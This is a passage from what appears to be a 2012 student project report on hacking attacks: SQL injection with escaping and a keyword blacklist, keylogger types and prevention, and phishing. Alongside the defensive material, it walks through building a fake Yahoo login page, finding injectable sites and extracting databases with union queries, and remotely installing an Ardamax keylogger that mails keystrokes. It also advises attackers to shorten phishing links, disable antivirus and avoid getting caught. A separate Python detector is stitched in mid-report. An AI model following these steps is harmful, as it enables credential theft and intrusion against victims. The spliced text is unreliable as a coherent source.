version escapes the string according to the current character set. The character set is ignored
by mysql_escape_string, which can leave some vulnerabilities open for sophisticated hackers. If
you find that you are using an older version of PHP and you are trying to protect sensitive data,
you really should upgrade to a current version of either PHP 4 or PHP 5.

So what does mysql_real_escape_string do?

This PHP library function prepends backslashes to the following characters: \n, \r, \, \x00, \x1a, '
and ". The important part is that the single and double quotes are escaped, because these are
the characters most likely to open up vulnerabilities.

For those who do not know what an escape is, it is a character that is pre-pended to another
character. When a character is escaped, it is ignored by the database. In other words, it makes
that character ineffective in a query. In the case of PHP, an escaped character is treated
differently by the PHP parser. The standard escape character used by PHP and MySQL is the
backslash.

In the case of the SQL query example used above, after running it through the routine, it now
looks like this, which breaks the query :

SELECT * FROM items WHERE itemID = '\' OR \'1\' = \'1'

This method should stop the bulk of the SQL injection attacks, but crackers and hackers are very
creative and are always finding new methods to break into systems. There are additional steps
that can be taken to filter out certain words, such as drop, grant, union, etc., but using this
method will strip these words from searches performed by your users. However, if you want to
add another level of security and do not have an issue with certain words being deleted from
queries, you can add the following just before if (phpversion() >= '4.3.0').

$badWords = array("/delete/i", "/update/i","/union/i","/insert/i","/drop/i","/http/i","/--/i");

$string = preg_replace($badWords, "", $string);

This additional step should prevent a malicious attacker from damaging a database if they
found a way to slip through. Just remember that if you take this additional step and you have a
site where someone might search for a "plumbing union" or a "drop cloth", those queries
would not work as intended. If you are wondering what the trailing 'i' is following each word in
the array, it is required to make the preg_replace replacements case insensitive. This wasn't
needed with eregi_replace, but that function has been deprecated in PHP 5.3
(http://www.tech-evangelist.com/2009/11/11/php-deprecated-features/). Another important
step that needs to be taken with any database is controlling user privileges. When setting up a
MySQL user, you should never assign any more privileges than they actually need to accomplish
the tasks that you allow on your site. Privileges are easily assigned and managed through
phpMyAdmin, which is found in the control panel (cPanel, Plesk, etc.) for most hosting
companies.

3. Key logger Attack

This is one of the oldest and simplest methods of hacking a computer. A keylogger is a piece of
hardware or software that logs everything someone types. Keyloggers are extremely easy to
make for Windows using C++ and the "GetAsyncKeyState" function, and when combined with a
little con ("you need this software to open the file") you can generally get people to download
the software. Then you program the software to email you, after a week, everything they typed
and delete itself. Phishing involves making a website that looks just like another website, but
when the user logs in, you steal their username/password. You could reconfigure a person's
network settings so that a site like yahoo.com or gmail.com forwards to your version of
Gmail/Yahoo instead. Then, when they try to log in, you steal their passwords, store them, and
display some "you need to update" message. Once they update, it removes your phishing scam
and the user never even knows you stole their password. Any decent antivirus software will
prevent this sort of thing by locking down your internet connection settings and tracking
computer programs for calls to "GetAsyncKeyState" or other common keylogging functions (at
least, they "should" be doing this).

Keystroke logging (often called keylogging) is the action of tracking (or logging) the keys struck
on a keyboard, typically in a covert manner so that the person using the keyboard is unaware
that their actions are being monitored. However, most keylogging programs prohibit
downloading from the affected victim due to encryption issues and wireless-to-computer
difficulties (unless directly on the victim's computer). There are numerous keylogging methods,
ranging from hardware and software-based approaches to electromagnetic and acoustic
analysis.

Keyloggers are applications or devices that monitor the physical keystrokes of a computer user.
They then either aggregate the information locally for later retrieval or send it off to a spyware
server on the Internet. Some businesses use keyloggers, such as with the Spector Pro system, to
monitor employee activity, but the vast majority are applications installed without the user's
knowledge as part of a software download or system intrusion.

The true danger posed by keyloggers is their ability to bypass encryption controls and gather
sensitive data directly from the user. All the encryption in the world will not secure your data if
a hacker watches you type your encryption key. He can then simply use that plaintext key to
decrypt all of your "protected" communications from that point forward!




Software-based keyloggers

These are software programs designed to work on the target computer's operating system.
From a technical perspective there are five categories:

   - Hypervisor-based: The keylogger can theoretically reside in a malware hypervisor
     running underneath the operating system, which remains untouched. It effectively
     becomes a virtual machine. Blue Pill is a conceptual example.
   - Kernel-based: This method is difficult both to write and to combat. Such keyloggers
     reside at the kernel level and are thus difficult to detect, especially for user-mode
     applications. They are frequently implemented as rootkits that subvert the operating
     system kernel and gain unauthorized access to the hardware, making them very
     powerful. A keylogger using this method can act as a keyboard device driver, for
     example, and thus gain access to any information typed on the keyboard as it goes to
     the operating system.
   - API-based: These keyloggers hook keyboard APIs; the operating system then notifies the
     keylogger each time a key is pressed and the keylogger simply records it. Windows APIs
     such as GetAsyncKeyState(), GetForegroundWindow(), etc. are used to poll the state
     of the keyboard or to subscribe to keyboard events.[1] These types of keyloggers are the
     easiest to write, but where constant polling of each key is required, they can cause a
     noticeable increase in CPU usage, and can also miss the occasional key. A more recent
     example simply polls the BIOS for pre-boot authentication PINs that have not been
     cleared from memory.[2]
   - Form grabbing based: Form grabbing-based keyloggers log web form submissions by
     recording the web browser's onsubmit event functions. This records form data before it
     is passed over the Internet and bypasses HTTPS encryption.
   - Packet analyzers: This involves capturing network traffic associated with HTTP POST
     events to retrieve unencrypted passwords.

Remote access software keyloggers

These are local software keyloggers with an added feature that allows access to the locally
recorded data from a remote location. Remote communication may be achieved using one of
these methods:

   - Data is uploaded to a website, database or an FTP server.
   - Data is periodically emailed to a pre-defined email address.
   - Data is wirelessly transmitted by means of an attached hardware system.
   - The software enables a remote login to the local machine from the Internet or the local
     network, for data logs stored on the target machine to be accessed.




Related features

Software keyloggers may be augmented with features that capture user information without
relying on keyboard key presses as the sole input. Some of these features include:

   - Clipboard logging. Anything that has been copied to the clipboard can be captured by
     the program.

   - Screen logging. Screenshots are taken in order to capture graphics-based information.
     Applications with screen logging abilities may take screenshots of the whole screen, just
     one application or even just around the mouse cursor. They may take these screenshots
     periodically or in response to user behaviours (for example, when a user has clicked the
     mouse). A practical application used by some keyloggers with this screen logging ability
     is to take small screenshots around where a mouse has just clicked; these defeat web-
     based keyboards (for example, the web-based screen keyboards that are often used by
     banks) and any web-based on-screen keyboard without screenshot protection.

   - Programmatically capturing the text in a control. The Microsoft Windows API allows
     programs to request the text 'value' in some controls. This means that some passwords
     may be captured, even if they are hidden behind password masks (usually asterisks).

   - The recording of every program/folder/window opened, including a screenshot of each,
     and every website visited, also including a screenshot of each.

   - The recording of search engine queries, instant messenger conversations, FTP
     downloads and other Internet-based activities (including the bandwidth used).




Hardware-based keyloggers

Hardware-based keyloggers do not depend upon any software being installed as they exist at a
hardware level in a computer system.

   - Firmware-based: BIOS-level firmware that handles keyboard events can be modified to
     record these events as they are processed. Physical and/or root-level access is required
     to the machine, and the software loaded into the BIOS needs to be created for the
     specific hardware that it will be running on.[4]
   - Keyboard hardware: Hardware keyloggers are used for keystroke logging by means of a
     hardware circuit that is attached somewhere in between the computer keyboard and
     the computer, typically inline with the keyboard's cable connector. More stealthy
     implementations can be installed or built into standard keyboards, so that no device is
     visible on the external cable. Both types log all keyboard activity to their internal
     memory, which can be subsequently accessed, for example, by typing in a secret key
     sequence.[5] A hardware keylogger has an advantage over a software solution: it is not
     dependent on being installed on the target computer's operating system and therefore
     will not interfere with any program running on the target machine or be detected by
     any software. However its physical presence may be detected if, for example, it is
     installed outside the case as an inline device between the computer and the keyboard.
     Some of these implementations have the ability to be controlled and monitored
     remotely by means of a wireless communication standard.[6]

Wireless keyboard sniffers

These passive sniffers collect packets of data being transferred from a wireless keyboard and its
receiver. As encryption may be used to secure the wireless communications between the two
devices, this may need to be cracked beforehand if the transmissions are to be read.



Keyboard overlays

Criminals have been known to use keyboard overlays on ATMs to capture people's PINs. Each
keypress is registered by the keyboard of the ATM as well as the criminal's keypad that is placed
over it. The device is designed to look like an integrated part of the machine so that bank
customers are unaware of its presence.




Acoustic keyloggers

Acoustic cryptanalysis can be used to monitor the sound created by someone typing on a
computer. Each key on the keyboard makes a subtly different acoustic signature when stroked.
It is then possible to identify which keystroke signature relates to which keyboard character via
statistical methods such as frequency analysis. The repetition frequency of similar acoustic
keystroke signatures, the timings between different keyboard strokes and other context
information such as the probable language in which the user is writing are used in this analysis
to map sounds to letters.[8] A fairly long recording (1000 or more keystrokes) is required so that
a big enough sample is collected.[9]



Electromagnetic emissions

It is possible to capture the electromagnetic emissions of a wired keyboard from up to 20
metres (66 ft) away, without being physically wired to it.[10] In 2009, Swiss researchers tested 11
different USB, PS/2 and laptop keyboards in a semi-anechoic chamber and found them all
vulnerable, primarily because of the prohibitive cost of adding shielding during manufacture.[11]
The researchers used a wide-band receiver to tune into the specific frequency of the emissions
radiated from the keyboards.




Steps For Creating Keylogger In Ardamax Keylogger

Step 1: A remote installation has to be done in the keylogger.

Step 2: There is an installation wizard for remote installation.

Step 3: We have to follow some steps for the installation.

Step 4: In this installation we have to set some settings.

Step 5: After installation all keystrokes are sent to your mail id.

Prevention From Key Logger Attacks

Here are five steps you can take to detect existing spyware and prevent future infections on
your network:



   1. Install spyware filters at the host level. There are plenty of spyware scanners available
      on the market. If you're looking for an inexpensive solution, you might consider
      Microsoft's beta tool, Windows Antispyware, Spybot or AdAware. Many commercial
      antivirus vendors, such as McAfee, also have spyware filters available that snap in to
      your enterprise antivirus solution.

   2. Install an application gateway with spyware content filtering. We're just starting to see
      the emergence of spyware appliance solutions that operate at the network level. One
      such system is the Blue Coat Spyware Interceptor. If your budget can bear it, you might
      consider this type of solution.

   3. Place egress filters on your network. It never hurts to have a good set of egress filters
      on your network. They might assist in blocking spyware attempting to "phone home."

   4. Monitor your intrusion-detection system (IDS) and keep the signatures current. If
      you're not able to block spyware from phoning home, you might at least be able to
      detect it with your IDS and use the reports to identify infected systems.

   5. Prevent users from installing downloaded software. Most spyware installations are the
      result of users installing unauthorized software downloaded from the Internet. If your
      organization's security policy permits, you should implement technical controls to
      prevent this type of activity.

Spyware, and the associated crime of identity theft, is one of the most important battles
currently facing information security professionals. It's time to ensure that your organization is
safe. Following these steps will help bring you closer to that goal.
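As an added example for steps 3 and 4 above (egress filtering and IDS monitoring for spyware that "phones home"), and not part of the report: a small Python detector that parses constructed egress-log lines and flags flows whose connection interval is nearly constant, which is the pattern left by the periodic upload or scheduled email methods listed under "Remote access software keyloggers". The log format, the 10.0.0.15 host and the 203.0.113.9 / 198.51.100.20 destinations are constructed (documentation address ranges), and the jitter threshold is an assumed starting value to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed egress-log sample (syslog-like; hosts use documentation address ranges).
# 10.0.0.15 opens an FTP connection to 203.0.113.9 every five minutes on the dot,
# alongside ordinary, irregularly spaced HTTPS traffic to 198.51.100.20.
SAMPLE_LOG = """\
2012-05-04T10:00:00 src=10.0.0.15 dst=203.0.113.9 dport=21 bytes=4820
2012-05-04T10:01:12 src=10.0.0.15 dst=198.51.100.20 dport=443 bytes=1200
2012-05-04T10:05:00 src=10.0.0.15 dst=203.0.113.9 dport=21 bytes=4903
2012-05-04T10:10:00 src=10.0.0.15 dst=203.0.113.9 dport=21 bytes=4711
2012-05-04T10:13:40 src=10.0.0.15 dst=198.51.100.20 dport=443 bytes=880
2012-05-04T10:15:00 src=10.0.0.15 dst=203.0.113.9 dport=21 bytes=4988
2012-05-04T10:20:00 src=10.0.0.15 dst=203.0.113.9 dport=21 bytes=4602
2012-05-04T10:25:00 src=10.0.0.15 dst=203.0.113.9 dport=21 bytes=4850
2012-05-04T10:31:05 src=10.0.0.15 dst=198.51.100.20 dport=443 bytes=15000
2012-05-04T10:33:50 src=10.0.0.15 dst=198.51.100.20 dport=443 bytes=2300
this line is deliberately malformed and must be skipped by the parser
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) bytes=(?P<bytes>\d+)$"
)


def parse_log(text):
    """Parse log lines into dicts; malformed lines are skipped instead of aborting the run."""
    events = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        events.append({
            "ts": datetime.fromisoformat(match["ts"]),
            "src": match["src"],
            "dst": match["dst"],
            "dport": int(match["dport"]),
            "bytes": int(match["bytes"]),
        })
    return events


def find_periodic_flows(events, min_events=4, max_jitter=0.15):
    """Flag (src, dst, dport) flows whose gaps between connections are nearly constant.

    A scheduled upload or mail-out produces a fixed period with little jitter; human
    browsing does not. max_jitter is the permitted standard deviation of the gaps
    relative to their mean (0.15 is an assumed starting point, to be tuned per network).
    Returns a list of (src, dst, dport, mean_gap_seconds).
    """
    flows = defaultdict(list)
    for event in events:
        flows[(event["src"], event["dst"], event["dport"])].append(event["ts"])
    flagged = []
    for (src, dst, dport), stamps in flows.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            flagged.append((src, dst, dport, avg))
    return flagged


if __name__ == "__main__":
    for src, dst, dport, period in find_periodic_flows(parse_log(SAMPLE_LOG)):
        print(f"periodic flow: {src} -> {dst}:{dport} every {period:.0f}s (review for phone-home)")
```

A hit from this check is a lead for the egress-filter and IDS review in steps 3 and 4, not a verdict: legitimate schedulers (backups, update checks) beacon too, so the flagged destination has to be compared against the allow-list before the flow is blocked.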

                                      SCREEN SHOTS

(One screenshot per numbered step; only the captions survive in this text version.)

1. Phishing

Steps

   1. Create an account on any free web hosting site.
   2. Registering.
   3. Create a yahoo.com HTML login page.
   4. Upload the PHP script and other files.
   5. Log in to the website.
   6. Login main page.
   7. Click File Manager.
   8. Upload file list.

2. SQL Injection Attacks

Steps

   1. Search for an SQL-injection-vulnerable site on Google.
   2. Put ' (single quote) at the extreme end of the link displayed in the address bar and
      press Enter.
   3. Now if a page opens up saying there is an SQL error, that means the website is 110%
      vulnerable to SQL injection.
   4. to 9. The remaining captions repeat, word for word, items 3 to 8 of the manual
      procedure in the "Steps For SQL Injection Attacks" section above (order by, union all
      select, information_schema.tables, information_schema.columns, group_concat, login
      details), one screenshot per step.

3. Key Logger Attacks

Steps

   1. In this keylogger attack we use the Ardamax keylogger to create a keylogger, using
      remote installation by a wizard in which particular settings are done.
   2. to 12. Screenshots of the remaining wizard steps, without captions.
Limitation of Project

In this project there might be some limitations due to technical problems in the system; all the
hacking attacks work only under some conditions.

The conditions under which these hacking attacks can be performed are:

1. In a phishing attack there may be some chance of getting caught, so you have to use a URL
   shortener before sending the phishing link to the victim.

2. If you are using a free hosting site for phishing, the account can be closed; in this case you
   may need to create another account on the hosting site.

3. Be careful before sending the phishing link to the victim.

4. In SQL injection some problems can occur during the search for an SQL-vulnerable website; in
   this case you can use SQL Poison, a tool that helps you search for websites.

5. For an SQL injection attack you may need some patience while performing it, because it takes
   so much time.

6. For ease you may use the Havij tool for finding the database of the website.

7. Be careful while performing an SQL injection attack; you might be caught.

8. In a keylogger attack you may need the remote installation.

9. Before remote installation you have to disable your antivirus and install it to create a
   keylogger.

10. Be careful before installing the keylogger on the victim's computer; you might be caught.

11. These hacking attacks can cause problems to your system.




Future Scope

In this project our main motive is to provide information about hacking attacks so that you can
protect yourself from these hacking attacks.

In future we intend to provide some protection methods against these hacking attacks.

In the field of information technology nothing is safe and secure; our technology has some
loopholes or limitations, and black hat hackers take advantage of this insecurity.

So our main motive is to protect the information on the internet or in the system.




Reference

   1. Appin Technology Kit
   2. Internet
   3. IT Security and ethical hacking
   4. YouTube
   5. Google
   6. Wikipedia





				
DOCUMENT INFO
posted: 5/4/2012
language: English
pages: 69
Description: This Simple Project Report Based On Security For Hacking Attacks